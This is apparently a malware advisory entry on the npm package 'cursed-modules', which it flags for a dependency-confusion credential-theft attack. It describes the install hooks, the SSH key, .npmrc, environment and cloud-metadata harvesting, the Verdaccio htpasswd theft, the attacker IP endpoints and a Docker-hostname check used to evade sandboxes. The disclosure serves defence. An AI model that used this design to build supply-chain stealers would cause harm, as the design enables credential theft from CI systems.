MAL-2026-6698
Malicious code in cursed-modules (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0a7db807a976b54ad8fe1246159e9ac2e5830671792d2ae8e388bf30435d36c3) Package version 999.0.3 (an extremely high version number consistent with a dependency-confusion attack against an internal package name) ships install-time and require-time credential theft directed at a hardcoded attacker endpoint. package.json declares all three lifecycle hooks (preinstall, install, postinstall) as `node install.js`. install.js reads /root/.ssh/id_rsa, id_ed25519, authorized_keys, known_hosts, ssh config, /root/.npmrc, /app/.git/config + git history, and the full process.env, base64-encodes the bundle and PUTs it to http://154.57.164.82:30843/api/modules/ECT-839201. index.js (the package main) runs a top-level IIFE on require() that dumps process.env, runs `aws sts get-caller-identity`, queries the AWS instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/, and runs `aws secretsmanager list-secrets`, PUTing the results to the same attacker IP at path /api/modules/ECT-654321. recon.js targets private npm registry infrastructure: reads /verdaccio/conf/config.yaml, finds and reads Verdaccio htpasswd files, /root/.npmrc and /home/user/.npmrc, cron jobs, process list, netstat, /proc/1/environ, and full env, and PUTs to http://154.57.164.76:30728/api/modules/ECT-654321 (with a curl shell fallback). Both install.js and index.js gate execution on `/^[0-9a-f]{12}$/.test(os.hostname())` — a Docker container ID regex — so the payload only fires inside containerized CI/CD environments and stays dormant on researcher sandboxes and developer laptops. publish-and-arm.sh labels the package manifest with `ship_deck: "dependency-confusion"` and `cargo_hold: "verdaccio-proxy"`, confirming the package's purpose is to shadow an internal name on the public registry and harvest the victim's private registry credentials for follow-on attacks.
## Source: ossf-package-analysis (0dade1c70e7e7f58c8f791931e5fe7cf7c40b68358173ed097b7dca6a4f4041d) The OpenSSF Package Analysis project identified 'cursed-modules' @ 999.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for cursed-modules (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/cursed-modules/v/999.0.0 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.3 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.1 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.2 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/2.0.0 [PACKAGE]